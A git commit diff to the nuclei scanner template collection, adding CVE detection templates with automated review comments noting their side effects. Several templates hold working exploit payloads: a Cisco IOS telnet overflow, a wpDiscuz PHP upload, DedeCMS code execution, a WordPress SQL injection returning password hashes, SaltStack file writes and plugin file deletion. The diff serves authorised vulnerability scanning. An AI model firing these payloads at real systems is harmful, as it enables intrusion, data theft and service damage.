patch-1
sandeep 2021-03-17 17:12:34 +05:30
commit e01c3942bc
100 changed files with 868 additions and 118 deletions


@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts | Templates | Counts |
| -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ |
| cves | 237 | vulnerabilities | 106 | exposed-panels | 104 |
| exposures | 63 | technologies | 50 | misconfiguration | 54 |
| workflows | 23 | miscellaneous | 16 | default-logins | 19 |
| cves | 245 | vulnerabilities | 111 | exposed-panels | 107 |
| exposures | 63 | technologies | 52 | misconfiguration | 54 |
| workflows | 24 | miscellaneous | 16 | default-logins | 19 |
| exposed-tokens | 9 | dns | 6 | fuzzing | 4 |
| helpers | 2 | takeovers | 1 | - | - |
**75 directories, 717 files**.
**76 directories, 738 files**.
</td>
</tr>


@ -0,0 +1,26 @@
id: CVE-2017-3881
info:
name: Cisco IOS 12.2(55)SE11 Remote Code Execution
author: dwisiswant0
severity: critical
reference: |
- https://github.com/artkond/cisco-rce
- https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/
- https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/dos/cisco/ios_telnet_rocem.md
description: RCE exploit code is available for Cisco Catalyst 2960 switch model. This exploit is firmware dependent.
tags: cve,cve2017,cisco,rce,network
network:
- inputs:
- data: "{{hex_decode('fffa240003')}}CISCO_KITS{{hex_decode('01')}}2:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA{{hex_decode('000037b4023d55dc0000999c')}}BBBB{{hex_decode('00e1a9f4')}}CCCCDDDDEEEE{{hex_decode('00067b5c023d55c8')}}FFFFGGGG{{hex_decode('006cb3a000270b94')}}HHHHIIII{{hex_decode('014acf98')}}JJJJKKKKLLLL{{hex_decode('0114e7ec')}}:15:{{hex_decode('fff0')}}"
read: 1024
- data: "show priv"
read: 1024
host:
- "{{Hostname}}:23"
read-size: 1024
matchers:
- type: word
words:
- "Current privilege level is"
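Review bot: The `data:` payload on the first input is the live exploit rather than a version probe, and the third reference is a Metasploit `auxiliary/dos` module, so running this against an affected switch may crash or reload it; the `description:` should say so. Suggest `description: Sends the public exploit payload over telnet and checks for a privilege-level change. Intrusive - the referenced Metasploit module is a DoS module and affected Catalyst switches may crash or reload. Firmware dependent.` The per-input `read: 1024` lines duplicate the top-level `read-size: 1024`; if the loader honours both, one of them is redundant.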


@ -0,0 +1,26 @@
id: CVE-2018-1207
info:
name: Dell iDRAC7 and iDRAC8 Devices Code Injection/RCE
author: dwisiswant0
severity: critical
reference: https://downloads.dell.com/solutions/dell-management-solution-resources/iDRAC_CVE%201207_1211_1000116.pdf
description: |
This template supports the detection part only.
Dell EMC iDRAC7/iDRAC8, versions prior to 2.52.52.52, contain CGI injection vulnerability
which could be used to execute remote code. A remote unauthenticated attacker may
potentially be able to use CGI variables to execute remote code.
https://github.com/KraudSecurity/Exploits/blob/master/CVE-2018-1207/CVE-2018-1207.py
tags: cve,cve2018,dell,injection,rce
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/login?LD_DEBUG=files"
matchers:
- type: word
words:
- "calling init: /lib/"
part: all
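Review bot: The PoC link on the last line of the `description:` block belongs in `reference:` next to the Dell advisory, so tooling that reads references picks it up and the description does not end in a bare URL. Change to `reference: |` followed by `- https://downloads.dell.com/solutions/dell-management-solution-resources/iDRAC_CVE%201207_1211_1000116.pdf` and `- https://github.com/KraudSecurity/Exploits/blob/master/CVE-2018-1207/CVE-2018-1207.py`, and drop the URL line from the description. The other new templates in this commit pair their word matcher with a `status` matcher; this one relies on the `calling init: /lib/` word alone, which is probably fine given how specific it is.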


@ -0,0 +1,37 @@
id: CVE-2018-3810
info:
name: WordPress Smart Google Code Inserter Authentication Bypass
author: princechaddha
severity: critical
reference: https://www.exploit-db.com/exploits/43420
tags: wordpress,auth-bypass,cve,cve2018
requests:
- method: POST
path:
- "{{BaseURL}}/wp-admin/options-general.php?page=smartcode"
body: 'sgcgoogleanalytic=<script>console.log("Nuclei - Open-source project [github.com/projectdiscovery/nuclei]")</script>&sgcwebtools=&button=Save+Changes&action=savegooglecode'
headers:
Content-Type: application/x-www-form-urlencoded
- method: GET
path:
- "{{BaseURL}}/"
matchers-condition: and
matchers:
- type: word
words:
- "text/html"
part: header
- type: word
words:
- '<script>console.log("Nuclei - Open-source project [github.com/projectdiscovery/nuclei]")</script>'
part: body
- type: status
status:
- 200
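Review bot: The POST on the `body:` line writes the marker script into the plugin's stored `sgcgoogleanalytic` option and blanks `sgcwebtools`, and nothing in the template restores either, so every successful run overwrites the site's existing values and leaves a `<script>` on all of its pages. The template has no `description:`; add one that states this, e.g. `description: Overwrites the target's stored Smart Google Code Inserter settings (sgcgoogleanalytic is replaced with a marker script, sgcwebtools is cleared) and does not restore them; the marker persists on every page until removed manually. Intrusive.` The marker is only looked for on `/`, so a site that does not render the snippet on its front page may be missed even though the write succeeded.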


@ -0,0 +1,28 @@
id: CVE-2018-6910
info:
name: DedeCMS 5.7 path disclosure
author: pikpikcu
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-6910
description: DedeCMS 5.7 allows remote attackers to discover the full path via a direct request for include/downmix.inc.php or inc/inc_archives_functions.php
tags: cve,cve2018,dedecms
requests:
- method: GET
path:
- "{{BaseURL}}/include/downmix.inc.php"
matchers-condition: and
matchers:
- type: word
words:
- "downmix.inc.php"
- "Call to undefined function helper()"
part: body
condition: and
- type: status
status:
- 200
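Review bot: The `description:` names two files, `include/downmix.inc.php` and `inc/inc_archives_functions.php`, but only the first appears under `path:`, so the second vector is never checked. If the second path is added, the `downmix.inc.php` word in the `condition: and` matcher must be dropped or paired per path, otherwise the added request can never match; the simpler fix is to trim the description to the single path that is actually requested.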


@ -0,0 +1,27 @@
id: CVE-2018-7700
info:
name: DedeCMS V5.7SP2 RCE
author: pikpikcu
severity: high
reference: https://laworigin.github.io/2018/03/07/CVE-2018-7700-dedecms%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/
tags: cve,cve2018,dedecms,rce
requests:
- method: GET
path:
- "{{BaseURL}}/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}phpinfo();{/dede:field}"
matchers-condition: and
matchers:
- type: word
words:
- "phpinfo"
- "PHP Version"
part: body
condition: and
- type: status
status:
- 200
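Review bot: The `path:` line executes `phpinfo();` on the target through `runphp='yes'` with an empty `token=`, so a match means code actually ran on the host, yet the template has no `description:` saying so. Add `description: DedeCMS V5.7SP2 tag_test_action.php code execution; confirms by executing phpinfo() on the target. Intrusive.` The word `phpinfo` also appears in the request itself, so an application that echoes `partcode` back could satisfy that word on its own; `PHP Version` together with the `condition: and` is what keeps the matcher accurate, so keep both.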


@ -4,7 +4,7 @@ info:
name: Apache Tomcat XSS
author: pikpikcu
severity: low
reference:
reference: |
- https://seclists.org/fulldisclosure/2019/May/50
- https://wwws.nightwatchcybersecurity.com/2019/05/27/xss-in-ssi-printenv-command-apache-tomcat-cve-2019-0221/
description: |
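Review bot: `reference: |` on the changed line turns the two dash-prefixed URLs into one literal string that keeps the `- ` bullets as text and ends with a newline; `reference: |-` gives the same value without the trailing newline. This applies equally to the other `reference: |` hunks in this commit (Cisco RV320, CVE-2020-1147, Netsweeper, Kylin, Unomi, Oracle BI, WebLogic, MobileIron, SaltStack CVE-2020-16846, SharePoint CVE-2020-16952, Struts, Jenkins Gitlab Hook, wp-file-manager, Alerta, ServiceNow). If the loader expects a string for this field the block scalar is the right choice; if it accepts a sequence, the plain block sequence would be the structured form.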


@ -6,7 +6,7 @@ info:
severity: high
tags: cve,cve2019,cisco
description: A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an unauthenticated, remote attacker to retrieve sensitive information. The vulnerability is due to improper access controls for URLs. An attacker could exploit this vulnerability by connecting to an affected device via HTTP or HTTPS and requesting specific URLs. A successful exploit could allow the attacker to download the router configuration or detailed diagnostic information. Cisco has released firmware updates that address this vulnerability.
reference:
reference: |
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info
- https://www.exploit-db.com/exploits/46262/
- https://www.exploit-db.com/exploits/46655/


@ -6,7 +6,7 @@ info:
description: A remote code execution vulnerability exists in .NET Framework, Microsoft SharePoint, and Visual Studio when the software fails to check the source markup of XML file input, aka '.NET Framework, SharePoint Server, and Visual Studio Remote Code Execution Vulnerability'.
severity: critical
tags: cve,cve2020,sharepoint,iis,rce
reference:
reference: |
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1147
- https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html


@ -1,30 +0,0 @@
id: CVE-2020-12256
info:
name: rConfig 3.9.4 XSS
author: pikpikcu
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-12256
tags: cve,cve2020,rconfig,xss
requests:
- method: GET
path:
- '{{BaseURL}}/devicemgmt.php?deviceId=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(document.cookie)</script>"
part: body
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"


@ -1,30 +0,0 @@
id: CVE-2020-12259
info:
name: rConfig 3.9.4 XSS
author: pikpikcu
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-12259
tags: cve,cve2020,rconfig,xss
requests:
- method: GET
path:
- '{{BaseURL}}/configDevice.php?rid=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(document.cookie)</script>"
part: body
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"


@ -6,7 +6,7 @@ info:
severity: critical
description: Netsweeper through 6.4.3 allows unauthenticated remote code execution because webadmin/tools/unixlogin.php (with certain Referer headers) launches a command line with client-supplied parameters, and allows injection of shell metacharacters.
tags: cve,cve2020,netsweeper,rce
reference:
reference: |
- https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/
- https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says


@ -11,7 +11,7 @@ info:
3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed
Kylin's configuration information without any authentication,
so it is dangerous because some confidential information entries will be disclosed to everyone.
reference:
reference: |
- https://kylin.apache.org/docs/release_notes.html
- https://s.tencent.com/research/bsafe/1156.html
tags: cve,cve2020,apache


@ -11,7 +11,7 @@ info:
that could execute code with the permission level of the running Java process.
This vulnerability affects all versions of Apache Unomi prior to 1.5.2. Apache Unomi users should upgrade to 1.5.2 or later.
reference:
reference: |
- https://securityboulevard.com/2020/11/apache-unomi-cve-2020-13942-rce-vulnerabilities-discovered/
- https://twitter.com/chybeta/status/1328912309440311297
tags: cve,cve2020,apache,rce


@ -0,0 +1,32 @@
id: CVE-2020-14092
info:
name: WordPress Payment Form For Paypal Pro Unauthenticated SQL Injection
author: princechaddha
severity: critical
reference: https://wpscan.com/vulnerability/10287
tags: cve,cve2020,wordpress,wp-plugin,sqli
requests:
- method: GET
path:
- "{{BaseURL}}/?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users"
matchers-condition: and
matchers:
- type: word
words:
- "text/html"
part: header
- type: word
words:
- '"user_login"'
- '"user_email"'
- '"user_pass"'
- '"user_activation_key"'
condition: and
part: body
- type: status
status:
- 200
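Review bot: The `query=SELECT%20*%20from%20wp_users` on the `path:` line pulls the whole user table, and the matcher requires `"user_pass"` in the body, so every positive hit returns the site's password hashes to the scanner and into any saved response output. Proving the injection does not need the hash column; narrow the request to `- "{{BaseURL}}/?cffaction=get_data_from_database&query=SELECT%20user_login%20from%20wp_users"` and match on `- '"user_login"'` alone, dropping the `user_pass`, `user_email` and `user_activation_key` words. If the plugin ignores the column list, the output is unchanged and the narrower matcher still holds, so this is safe either way.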


@ -6,7 +6,7 @@ info:
cvss: 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'
severity: high
tags: cve,cve2020,oracle,traversal
reference:
reference: |
- http://packetstormsecurity.com/files/159748/Oracle-Business-Intelligence-Enterprise-Edition-5.5.0.0.0-12.2.1.3.0-12.2.1.4.0-LFI.html
- https://www.oracle.com/security-alerts/cpuoct2020.html


@ -4,7 +4,7 @@ info:
name: Oracle WebLogic Server Unauthenticated RCE (and Patch Bypass)
author: dwisiswant0
severity: critical
reference:
reference: |
- https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
- https://twitter.com/jas502n/status/1321416053050667009
- https://youtu.be/JFVDOIL0YtA


@ -6,7 +6,7 @@ info:
severity: critical
description: |
A remote code execution vulnerability in MobileIron Core & Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0; and Sentry versions 9.7.2 and earlier, and 9.8.0; and Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier that allows remote attackers to execute arbitrary code via unspecified vectors.
reference:
reference: |
- https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html
- https://github.com/iamnoooob/CVE-Reverse/tree/master/CVE-2020-15505
- https://github.com/iamnoooob/CVE-Reverse/blob/master/CVE-2020-15505/hessian.py#L10


@ -9,7 +9,7 @@ info:
with the SSH client enabled, can result in shell injection.
This template supports the detection part only. See references.
reference:
reference: |
- https://mp.weixin.qq.com/s/R8qw_lWizGyeJS0jOcYXag
- https://github.com/vulhub/vulhub/tree/master/saltstack/CVE-2020-16846
tags: cve,cve2020,saltstack


@ -5,7 +5,7 @@ info:
author: dwisiswant0
severity: critical
description: A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-16951.
reference:
reference: |
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952
- https://srcincite.io/pocs/cve-2020-16952.py.txt
- https://github.com/rapid7/metasploit-framework/blob/1a341ae93191ac5f6d8a9603aebb6b3a1f65f107/documentation/modules/exploit/windows/http/sharepoint_ssi_viewstate.md


@ -4,7 +4,7 @@ info:
name: Apache Struts RCE
author: pikpikcu
severity: critical
reference:
reference: |
- http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html
- http://jvn.jp/en/jp/JVN43969166/index.html
- https://cwiki.apache.org/confluence/display/WW/S2-061


@ -5,7 +5,7 @@ info:
author: madrobot
severity: medium
description: Jenkins Gitlab Hook Plugin 1.4.2 and earlier does not escape project names in the build_now endpoint, resulting in a reflected XSS vulnerability.
reference:
reference: |
- https://jenkins.io/security/advisory/2020-01-15/#SECURITY-1683
- http://www.openwall.com/lists/oss-security/2020/01/15/1
- http://packetstormsecurity.com/files/155967/Jenkins-Gitlab-Hook-1.4.2-Cross-Site-Scripting.html


@ -0,0 +1,89 @@
id: CVE-2020-24186
info:
name: Unauthenticated File upload wpDiscuz WordPress plugin RCE
author: Ganofins
severity: critical
description: WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable sites server.
reference: https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md
tags: cve,cve2020,wordpress,wp-plugin,rce
requests:
- raw:
- |
GET /?p=1 HTTP/1.1
Host: {{Hostname}}
Accept: */*
Connection: close
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Length: 745
Accept: */*
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak
Origin: {{BaseURL}}
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: {{BaseURL}}
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close
------WebKitFormBoundary88AhjLimsDMHU1Ak
Content-Disposition: form-data; name="action"
wmuUploadFiles
------WebKitFormBoundary88AhjLimsDMHU1Ak
Content-Disposition: form-data; name="wmu_nonce"
{{wmuSecurity}}
------WebKitFormBoundary88AhjLimsDMHU1Ak
Content-Disposition: form-data; name="wmuAttachmentsData"
undefined
------WebKitFormBoundary88AhjLimsDMHU1Ak
Content-Disposition: form-data; name="wmu_files[0]"; filename="rce.php"
Content-Type: image/png
{{base64_decode('/9j/4WpFeGlmTU0q/f39af39Pv39/f39/f39/f2o/f39/cD9/f39/f39/f39/f/g/UpGSUb9/f39/9tD/f0M/QwK/f0=')}}
<?php phpinfo();?>
------WebKitFormBoundary88AhjLimsDMHU1Ak
Content-Disposition: form-data; name="postId"
1
------WebKitFormBoundary88AhjLimsDMHU1Ak--
extractors:
- type: regex
part: body
internal: true
name: wmuSecurity
group: 1
regex:
- 'wmuSecurity":"([a-z0-9]+)'
- type: regex
part: body
group: 1
regex:
- '"url":"([a-z:\\/0-9-.]+)"'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'success":true'
- 'fullname'
- 'shortname'
- 'url'
condition: and
part: body
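Review bot: The second raw request uploads `rce.php` containing `<?php phpinfo();?>` to the target and no later request removes it, so each positive run leaves an executable PHP file on the site; the second extractor prints its `"url"`, which is the only handle an operator has for clean-up. The `description:` should state this, e.g. append `Intrusive: uploads rce.php (phpinfo) through wmuUploadFiles and does not delete it; the uploaded file URL is extracted so it can be removed.` The hard-coded `Content-Length: 745` cannot match a body whose `{{wmuSecurity}}` nonce varies in length; unless the runner recomputes it, drop that header and let the client set it.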


@ -5,7 +5,7 @@ info:
author: foulenzer
severity: critical
description: The vulnerability allows unauthenticated remote attackers to upload .php files. This templates only detects the plugin, not its vulnerability.
reference:
reference: |
- https://plugins.trac.wordpress.org/changeset/2373068
- https://github.com/w4fz5uck5/wp-file-manager-0day
tags: cve,cve2020,wordpress,rce


@ -5,7 +5,7 @@ info:
author: CasperGN
severity: critical
description: Alerta prior to version 8.1.0 is prone to Authentication Bypass when using LDAP as authorization provider and the LDAP server accepts Unauthenticated Bind reqests.
reference:
reference: |
- https://github.com/advisories/GHSA-5hmm-x8q8-w5jh
- https://tools.ietf.org/html/rfc4513#section-5.1.2
- https://pypi.org/project/alerta-server/8.1.0/


@ -0,0 +1,79 @@
id: CVE-2020-35951
info:
name: Wordpress Quiz and Survey Master Arbitrary File Deletion
author: princechaddha
severity: critical
reference: https://www.wordfence.com/blog/2020/08/critical-vulnerabilities-patched-in-quiz-and-survey-master-plugin/
tags: cve,cve2020,wordpress,wp-plugin
requests:
- raw:
- |
GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Connection: close
- |
GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Connection: close
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Length: 269
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBJ17hSJBjuGrnW92
Accept: */*
Accept-Language: en-US,en;q=0.9
Connection: close
------WebKitFormBoundaryBJ17hSJBjuGrnW92
Content-Disposition: form-data; name="action"
qsm_remove_file_fd_question
------WebKitFormBoundaryBJ17hSJBjuGrnW92
Content-Disposition: form-data; name="file_url"
{{fullpath}}wp-content/plugins/quiz-master-next/README.md
------WebKitFormBoundaryBJ17hSJBjuGrnW92--
- |
GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Connection: close
extractors:
- type: regex
name: fullpath
internal: true
part: body
group: 1
regex:
- "not found in <b>([/a-z_]+)wp"
req-condition: true
matchers-condition: or
matchers:
- type: word
words:
- '{"type":"success","message":"File removed successfully"}'
part: body
- type: dsl
dsl:
- "contains((body_1), '# Quiz And Survey Master') && status_code_4==301 && !contains((body_4), '# Quiz And Survey Master')"
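Review bot: The third raw request deletes `wp-content/plugins/quiz-master-next/README.md` on the target through `qsm_remove_file_fd_question`, the fourth only verifies that it is gone, and nothing restores it, yet the template has no `description:`. Add `description: Confirms arbitrary file deletion by deleting the plugin's own README.md on the target (not restored). Intrusive.` With `matchers-condition: or`, the `File removed successfully` word alone is a hit and the DSL check on `body_1`/`status_code_4`/`body_4` is only a fallback; if the intent was to require both the success message and the file's disappearance, `and` is needed.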


@ -0,0 +1,40 @@
id: CVE-2021-25281
info:
name: CVE-2021-25281 - SaltStack wheel_async unauth access
author: madrobot
severity: critical
reference: http://hackdig.com/02/hack-283902.htm
description: The SaltAPI does not honor eauth credentials for the wheel_async client. Thus, an attacker can remotely run any wheel modules on the master.
tags: cve,cve2021,saltapi,rce,saltstack
requests:
- raw:
- |
POST /run HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Content-Type: application/json
Content-Length: 173
Connection: close
{"client":"wheel_async","fun":"pillar_roots.write","data":"testing","path":"../../../../../../../tmp/testing","username":"1","password":"1","eauth":"pam"}
matchers-condition: and
matchers:
- type: word
words:
- "return"
- "tag"
- "jid"
- "salt"
- "wheel"
part: body
condition: and
- type: status
status:
- 200
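Review bot: The JSON body writes `testing` to `../../../../../../../tmp/testing` through `pillar_roots.write`, so a positive hit creates `/tmp/testing` on the Salt master and nothing removes it; the `description:` should say that the check writes a file. Suggest appending `This template writes /tmp/testing on the master to confirm the flaw; the file is not removed. Intrusive.` The hard-coded `Content-Length: 173` must equal the body's byte count, and the JSON body as shown here is noticeably shorter than that; unless the runner recomputes the header, the request may hang or be truncated, so either correct it or drop it.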


@ -0,0 +1,22 @@
id: cisco-finesse-login
info:
name: Cisco Finesse Login
author: dhiyaneshDK
severity: info
reference: https://www.exploit-db.com/ghdb/6824
tags: cisco
requests:
- method: GET
path:
- '{{BaseURL}}/desktop/container/landing.jsp?locale=en_US'
matchers-condition: and
matchers:
- type: word
words:
- '<title id="page_title">Sign in to Cisco Finesse</title>'
- type: status
status:
- 200


@ -0,0 +1,22 @@
id: mini-start-page
info:
name: Miniweb Start Page
author: dhiyaneshDk
severity: info
reference: https://www.exploit-db.com/ghdb/6500
requests:
- method: GET
path:
- "{{BaseURL}}/start.html"
- "{{BaseURL}}/www/start.html"
matchers-condition: and
matchers:
- type: word
words:
- '<title>Miniweb Start Page</title>'
part: body
- type: status
status:
- 200
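Review bot: This new template has no `tags:` line, although the rest of this commit is adding tags to existing templates; add e.g. `tags: miniweb,panel` after `reference:` (value constructed to match the commit's convention). The same omission is in the new tuxedo-connected-controller, panasonic-network-management and openam-detection templates further down.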


@ -0,0 +1,21 @@
id: tuxedo-connected-controller
info:
name: Tuxedo Connected Controller
author: dhiyaneshDk
severity: info
reference: https://www.exploit-db.com/ghdb/6486
requests:
- method: GET
path:
- "{{BaseURL}}/login.html"
matchers-condition: and
matchers:
- type: word
words:
- '<title>Tuxedo Connected Controller</title>'
part: body
- type: status
status:
- 200


@ -1,13 +1,10 @@
id: workspace-one-uem
# Reference:
# https://twitter.com/Jhaddix/status/1295861505963909120
info:
name: Workspace ONE UEM AirWatch Login Page
author: gevakun
severity: info
reference: https://twitter.com/Jhaddix/status/1295861505963909120
requests:
- method: GET
path:


@ -3,10 +3,7 @@ info:
name: Lotus Domino Configuration Page
author: gevakun
severity: low
# Reference:
# https://twitter.com/Wh11teW0lf/status/1295594085445709824
# Do not test any website without permission
reference: https://twitter.com/Wh11teW0lf/status/1295594085445709824
requests:
- method: GET


@ -43,4 +43,4 @@ requests:
part: body
group: 1
regex:
- '<span class="version">([0-9.]+)'
- '<span class="version">([0-9.]+)'


@ -6,6 +6,7 @@ info:
severity: critical
description: Groovy console is exposed, RCE is possible.
reference: https://hackerone.com/reports/672243
tags: aem
requests:
- method: GET


@ -4,6 +4,7 @@ info:
name: Apache Airflow API Exposure / Unauthenticated Access
author: pd-team
severity: medium
tags: apache,airflow,unauth
requests:
- method: GET


@ -6,6 +6,7 @@ info:
severity: low
description: The following example scripts that come with Apache Tomcat v4.x - v7.x and can be used by attackers to gain information about the system. These scripts are also known to be vulnerable to cross site scripting (XSS) injection.
reference: https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks
tags: apache
requests:
- method: GET


@ -4,6 +4,7 @@ info:
name: APCu service information leakage
author: koti2
severity: low
tags: config
requests:
- method: GET


@ -5,6 +5,7 @@ info:
author: dhiyaneshDk
severity: info
reference: https://portswigger.net/kb/issues/00100800_asp-net-debugging-enabled
tags: debug
requests:
- raw:


@ -5,6 +5,7 @@ info:
author: manikanta a.k.a @secureitmania
severity: info
reference: https://link.medium.com/fgXKJHR9P7
tags: aws
requests:
- method: GET


@ -3,6 +3,7 @@ info:
name: CGI Test page
author: YASH ANAND @yashanand155
severity: info
tags: cgi
requests:
- method: GET


@ -5,6 +5,7 @@ info:
author: dhiyaneshDK
severity: high
reference: https://suid.ch/research/DAP-2020_Preauth_RCE_Chain.html
tags: dlink,lfi
requests:
- method: POST


@ -4,6 +4,7 @@ info:
name: Django Debug Method Enabled
author: dhiyaneshDK
severity: medium
tags: django,debug
requests:
- method: GET


@ -4,6 +4,7 @@ info:
name: Docker Registry Listing
author: puzzlepeaches
severity: medium
tags: docker
requests:
- method: GET


@ -3,6 +3,7 @@ info:
name: Druid Monitor Unauthorized Access
author: 0h1in9e @ohlinge
severity: high
tags: druid,unauth
requests:
- method: GET


@ -4,6 +4,7 @@ info:
name: Drupal User Enumration [Ajax]
author: 0w4ys
severity: info
tags: drupal
requests:
- method: GET


@ -4,6 +4,7 @@ info:
name: Drupal User Enumration [Redirect]
author: 0w4ys
severity: info
tags: drupal
requests:
- method: GET


@ -4,6 +4,7 @@ info:
name: ElasticSearch Information Disclosure
author: Shine
severity: low
tags: es,unauth
requests:
- method: GET


@ -4,6 +4,7 @@ info:
name: Exposed Docker API
author: furkansenan & dwisiswant0
severity: info
tags: docker,unauth
requests:
- method: GET


@ -4,6 +4,7 @@ info:
name: Exposed Kibana
author: Shine
severity: medium
tags: kibana,unauth
requests:
- method: GET


@ -5,11 +5,10 @@ info:
author: dhiyaneshDK
severity: info
description: detectes misconfigured Service-now ITSM instances
reference: https://medium.com/@th3g3nt3l/multiple-information-exposed-due-to-misconfigured-service-now-itsm-instances-de7a303ebd56
# Thanks to Th3G3nt3lman for the writeup
# https://medium.com/@th3g3nt3l/multiple-information-exposed-due-to-misconfigured-service-now-itsm-instances-de7a303ebd56
# Exploitation :- https://github.com/leo-hildegarde/SnowDownKB/
reference: |
- https://medium.com/@th3g3nt3l/multiple-information-exposed-due-to-misconfigured-service-now-itsm-instances-de7a303ebd56
- https://github.com/leo-hildegarde/SnowDownKB/
tags: servicenow
requests:
- method: GET


@ -4,8 +4,7 @@ info:
name: FrontPage configuration information discloure
author: JTeles & pikpikcu
severity: info
# Reference: https://docs.microsoft.com/en-us/archive/blogs/fabdulwahab/security-protecting-sharepoint-server-applications
reference: https://docs.microsoft.com/en-us/archive/blogs/fabdulwahab/security-protecting-sharepoint-server-applications
requests:
- method: GET


@ -0,0 +1,29 @@
id: gitlab-public-repos
info:
name: GitLab public repositories
author: ldionmarcil
severity: info
tags: gitlab
reference: |
- https://twitter.com/ldionmarcil/status/1370052344562470922
- https://github.com/ldionmarcil/gitlab-unauth-parser
requests:
- method: GET
path:
- "{{BaseURL}}/api/v4/projects"
headers:
Cookie: _gitlab_session=
matchers-condition: and
matchers:
- type: word
part: header
words:
- "Set-Cookie: _gitlab_session="
- type: word
part: body
words:
- "name_with_namespace"
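Review bot: The `Cookie: _gitlab_session=` header sends an empty session on purpose, but nothing in the template explains why, and the header matcher on `Set-Cookie: _gitlab_session=` is likely satisfied by any GitLab response that issues a fresh session, so the real signal is the `name_with_namespace` body word. Add a `description:` such as `description: Requests /api/v4/projects with an empty _gitlab_session cookie; a response listing projects (name_with_namespace) means the project list is readable without authentication.` A `status` matcher on 200, as the other new templates in this commit use, would also keep an error page that happens to echo the field from matching.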


@ -3,6 +3,7 @@ info:
name: GitLab public snippets
author: pdteam
severity: info
tags: gitlab
reference: https://gist.github.com/vysecurity/20311c29d879e0aba9dcffbe72a88b10
requests:
@ -18,4 +19,9 @@ requests:
- type: status
status:
- 200
- 200
- type: word
words:
